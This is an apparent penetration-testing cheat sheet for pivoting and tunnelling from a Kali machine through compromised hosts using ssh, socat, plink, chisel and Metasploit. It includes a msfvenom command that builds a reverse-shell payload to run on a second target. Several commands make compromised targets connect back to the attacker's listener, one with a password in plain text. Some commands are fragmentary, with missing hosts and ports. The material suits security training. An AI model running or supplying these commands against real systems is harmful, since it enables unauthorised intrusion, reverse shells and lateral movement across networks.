Local port forwarding
Forward local port to remote host
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
Forward remote port to local host
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port
ssh -D <local proxy port> -p <remote port> <target>
socat file:`tty`,raw,echo=0 tcp-listen:8989
PORT FORWARDING "port to port":
----MSF---- Most platforms
Forward: Get meterpreter session on one of the dual homed machines portfwd add -l 4445 -p 4443 -r ip Use -R to make it reverse
----SSH---- For Linux
~C "if you already have an SSH session"
-R 8081:ip:80 (on my Kali machine listen on 8081, get it from
:8081<------------:80 Now you can access, which you didn't have direct access to
-L 8083:ip:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
:8084<------------:8083<------------:XXXX run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it
For reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=8083 -f exe -o shell Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd" ssh - -R 12345: [email protected]
---PLINK---- Just like SSH, on Windows service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe ip -P 22 -C -N -L -l KALIUSER -pw PASS
---SOCAT---- For linux
Forward your 8083 to ip:443 ./socat TCP4-LISTEN:8083,fork TCP4:ip:443
---CHISEL---- Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener": ./chisel server -p 8000 -reverse
General command: ./chisel client : L/R:[YOUR LOCAL IP]:::
Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client ip:8000 R:
Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client 9001:
DYNAMIC "port to any": setup proxychains with socks5 on Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf
----MSF---- Most platforms
Get meterpreter session on one of the dual homed machines Auto route to ip (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a)
----SSH---- For Linux
---PLINK--- Just like SSH, on Windows
On Target: plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL---- Most platforms
On Kali: ./chisel server -p 8000 -reverse
On Target: ./chisel client ip:8000 R:8001: ./chisel server -p 8001 --socks5
On Kali: ./chisel client socks